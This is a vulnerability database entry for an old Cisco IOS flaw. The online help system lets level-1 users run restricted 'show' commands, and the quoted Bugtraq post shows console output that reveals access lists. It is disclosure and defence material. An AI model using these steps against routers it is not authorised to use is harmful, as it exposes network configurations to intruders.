ID

VAR-E-200005-0121

CVE

TITLE

Cisco Router Online Help Vulnerability

DESCRIPTION

Under certain revisions of IOS multiple Cisco routers have an information leakage vulnerability in their online help systems. In essence this vulnerability allows users who currently have access to the router at a low level of privilege (users without access to the 'enable' password) can use the help system to view information which should only in theory be available to an 'enabled' user. This information is comprised of access lists among other things. The help system itself does not list these items as being available via the 'show' commands yet none the less it will execute them.
The message which detailed this vulnerability to the Bugtraq mailing list is attached in the 'Credit' section of this vulnerability entry. It is suggested that you read it if this vulnerability affects your infrastructure.

AFFECTED PRODUCTS

EXPLOIT

As taken from the original post on this vulnerability (See the Credit Section):
Routers tested: 2500, 2600, 3600, 4000, 7200, 7500 series,
running IOS 9.14, 11.1(21) (Distributed Director), 11.2(x)
and 12.0(x). Some were tested on the local console, some
over Telnet. We recently tested PIX 4.x, and found it was
NOT vulnerable.
A regular user will log-on with privilege level equal to 1.
This can be shown by running "show privilege" after logging
on the router. For example:
User Access Verification
Username: joeuser
Password: <password>
Router2>sh priv
Current privilege level is 1
Router2>
Now, if we try to get a list of all possible "show"
commands, by doing "show ?", we get:
Router2>show privilege
Current privilege level is 1
Router2>show ?
backup Backup status
cef Cisco Express Forwarding
clock Display the system clock
dialer Dialer parameters and statistics
flash: display information about flash: file
system
history Display the session command history
...
Notice that we did not see an "access-lists" option, so the
help system thinks we should not be able to run it...
However,
Router2>show privilege
Current privilege level is 1
Router2>show access-lists
Standard IP access list 10
permit 172.16.0.1
deny any
Extended IP access list eth0-IN
permit udp host 172.16.0.1 10.11.12.0 0.0.0.255 eq
snmp (14982 matches)
permit udp host 172.16.0.1 10.11.13.128 0.0.0.127 eq
snmp (4026 matches)
So, we can see the configuration, even though we shouldn't.
We can't alter it, but even seeing the access-list is
beneficial to an attacker.
Upon further testing on a 3640 running IOS 12.0(5), we got
the following results:
- We found 75 "show" commands that are supposed to be
available only in enable mode. Meaning: the difference
between "show ?" in enabled and disabled mode was this 75
commands
- Out of 75, only 13 were truly restricted. The other 62
were available to be viewed by a session in a disabled mode.
- Out of the 62 that were viewable, we counted 7 as being
potentially very dangerous. "show ip" is one of them, as
well as "show cdp", "show logging", "show cdp", "show
vlans". There are others, but I don't have my list with me
right now.
- By combining "show ip" and "show access-lists" we had a
very clear picture of how access-lists were distributed in
the router.

PRICE

Free

TYPE

Access Validation Error

CREDITS

This bug was discovered and documented by Fernando Montenegro fsmontenegro@iname.com and Claudio Silotto (csilotto@hotmail.com). The message detailing this vulnerability was sent to the Bugtraq mailing list on 2 May 2000.

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:51:18.831000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE